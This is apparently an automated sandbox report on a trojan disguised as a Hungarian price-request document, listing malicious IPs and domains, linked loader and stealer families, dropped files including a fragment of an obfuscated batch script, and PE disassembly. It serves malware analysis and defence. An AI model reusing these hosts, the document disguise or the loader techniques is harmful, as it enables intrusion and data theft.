                                                                                                                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.atingdilse.siteexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.ynapticshiftai.tech/d05n/www.eanliving.siteexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://mbsngradnja.com/244_RgzwnbqrkpnZ#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.eanliving.siteexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.egos.design/d05n/www.xc31.topexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            77.105.36.123
                                                                                                                            		mbsngradnja.comSerbia
                                                                                                                            		9125ORIONTELEKOM-ASRStrue
                                                                                                                            92.114.2.230
                                                                                                                            		voievodulgelu.roRomania
                                                                                                                            		6910DIALTELECOMROtrue

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1553904
                                                                                                                            Start date and time:2024-11-11 19:15:51 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 11m 34s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:13
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:1
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:rajnlat krs MOL093478524docx.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.evad.winEXE@290/6@14/2
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 86
                                                                                                                            • Number of non-executed functions: 246
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            13:16:45API Interceptor2x Sleep call for process: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe modified
                                                                                                                            13:17:00API Interceptor8587932x Sleep call for process: explorer.exe modified
                                                                                                                            13:17:38API Interceptor7433066x Sleep call for process: netsh.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            77.105.36.123Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                            • mbsngradnja.com/YLc7afPlL4RjCeK.exe
                                                                                                                            92.114.2.230#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • voievodulgelu.ro/244_Rgzwnbqrkpn

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            mbsngradnja.comConfirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            megerosites.cmdGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            Uplata_391.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            Ajanlatkeres_2024.05.29.PDF.exeGet hashmaliciousFormBook, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsmGet hashmaliciousFormBookBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            voievodulgelu.ro#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • 92.114.2.230
                                                                                                                            Obavestenje o prilivu za 16000501003826304627.xlsGet hashmaliciousAveMaria, UACMeBrowse
                                                                                                                            • 92.114.2.230

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            ORIONTELEKOM-ASRSppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 79.175.97.229
                                                                                                                            ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 178.254.155.221
                                                                                                                            jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.255.191.249
                                                                                                                            byte.arm.elfGet hashmaliciousOkiruBrowse
                                                                                                                            • 178.219.2.171
                                                                                                                            10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 77.105.36.128
                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 109.121.40.179
                                                                                                                            f5#U06f6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 77.105.36.128
                                                                                                                            Confirmation.docx.exeGet hashmaliciousDBatLoader, LokibotBrowse
                                                                                                                            • 77.105.36.123
                                                                                                                            #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 77.105.36.128
                                                                                                                            botx.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 79.175.73.90
                                                                                                                            DIALTELECOMROAmalgamers.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 86.107.36.93
                                                                                                                            #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                            • 92.114.2.230
                                                                                                                            FLITTIGL.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                            • 86.107.36.93
                                                                                                                            splppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.209.98.177
                                                                                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 93.114.114.57
                                                                                                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 46.102.13.204
                                                                                                                            SecuriteInfo.com.Win32.Sector.30.15961.3704.exeGet hashmaliciousSalityBrowse
                                                                                                                            • 89.41.154.115
                                                                                                                            n5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                                                                                                            • 89.41.154.115
                                                                                                                            PfBjDhHzvV.exeGet hashmaliciousMetasploit, SalityBrowse
                                                                                                                            • 89.41.154.115
                                                                                                                            https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            • 89.43.104.93

                                                                                                                            JA3 Fingerprints

                                                                                                                            No context

                                                                                                                            Dropped Files

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\Public\alpha.pifZiraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                              Qc238InLS3.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                r876789878767.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                  #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                    UR2WTRNmch.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                      2tKeEoCCCw.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                              z1SWIFT_MT103_Payment_552016_cmd.batGet hashmaliciousDBatLoader, FormBookBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\Public\Libraries\PNO

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:iov:iov
                                                                                                                                                MD5:BA64D7750A2764B4A814239B16694BED
                                                                                                                                                SHA1:44173C517074791FFA5E7C49E221B73DA50D4F0D
                                                                                                                                                SHA-256:9429C669F867AEECCD34ED938BEB917D650FC5557F1C0BF1CA67466A956E6041
                                                                                                                                                SHA-512:CB45D037CA06583C8771685516313971D73C0571BBEF13D1AEB398E4E11BAF51379D878CC52DAAC107F9D1DE8F3709B3A86CFE8A42FCA7BE98159CE9D688FE7D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:74..

                                                                                                                                                C:\Users\Public\Libraries\rqbnwzgR.cmd

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):62357
                                                                                                                                                Entropy (8bit):4.705712327109906
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                                                                                                C:\Users\Public\alpha.pif

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):236544
                                                                                                                                                Entropy (8bit):6.4416694948877025
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                                                                • Filename: Qc238InLS3.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: r876789878767.cmd, Detection: malicious, Browse
                                                                                                                                                • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse
                                                                                                                                                • Filename: UR2WTRNmch.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: 2tKeEoCCCw.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
                                                                                                                                                • Filename: E_dekont.cmd, Detection: malicious, Browse
                                                                                                                                                • Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious, Browse
                                                                                                                                                • Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\Public\xpha.pif

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):18944
                                                                                                                                                Entropy (8bit):5.742964649637377
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                \Device\Null

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):560
                                                                                                                                                Entropy (8bit):4.532578488470501
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNX:/p4xT5cp7u0wQakB4aV4t8Nq
                                                                                                                                                MD5:3590356B24CBB2F8E508903A82A31479
                                                                                                                                                SHA1:229AF4E5E706A72DD87578DB5148486F39241E86
                                                                                                                                                SHA-256:FDFB0F4095DF37BD607F769AC1D645CAED248BC4E251E8B0E76143004F6D7C2A
                                                                                                                                                SHA-512:FEB02635FD1E447889750296757A6A8ABEA231762F2C4A70ED18A475468975A6F57B88105E7EE6C7A7DC66E6C30E8FC5569FD096BA72368BB177C0723DDECF0D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.78 seconds.....

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.923151822709098
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 98.97%
                                                                                                                                                • InstallShield setup (43055/19) 0.43%
                                                                                                                                                • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                File name:#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                File size:1'056'768 bytes
                                                                                                                                                MD5:ffd79398ecb6b74ae4e751157796870b
                                                                                                                                                SHA1:cedc86d9d511aa0b4ee0102cfcda83c7eb296afc
                                                                                                                                                SHA256:5166f1f0d6693793e12932e324f36450126c907365ba4a9d45388831121bfcb1
                                                                                                                                                SHA512:c732b704cc6f93272085442f939143a3afe91e93d3403905d83b7bebb4966a5c1d708832e1b89058f244c098fae91e99412ef7b7297a1321abbcbc37c7c4850a
                                                                                                                                                SSDEEP:24576:/GBqWzMJ3rInJFhR1T6a3p6ZFlR+gKT44VoIOL7zk:/CHncaEYL6L
                                                                                                                                                TLSH:74259E65F5794C65E03765399CCAA7AF982CBF782929B4C126F11B3C1E3A394340ED83
                                                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:08302020c0c92020

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x45f75c
                                                                                                                                                Entrypoint Section:.itext
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:dc3a9be53431df0acf7fd7805ad1ffd7

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                                mov eax, 0045E65Ch
                                                                                                                                                call 00007FF6D902083Dh
                                                                                                                                                mov eax, dword ptr [00461BC4h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                call 00007FF6D90708A1h
                                                                                                                                                mov ecx, dword ptr [00461ACCh]
                                                                                                                                                mov eax, dword ptr [00461BC4h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                mov edx, dword ptr [0045E358h]
                                                                                                                                                call 00007FF6D90708A1h
                                                                                                                                                mov eax, dword ptr [00461BC4h]
                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                call 00007FF6D9070915h
                                                                                                                                                call 00007FF6D901E848h
                                                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x660000x251a.idata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x720000x98800.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6b0000x6a54.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x6a0000x18.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x666f40x5c8.idata
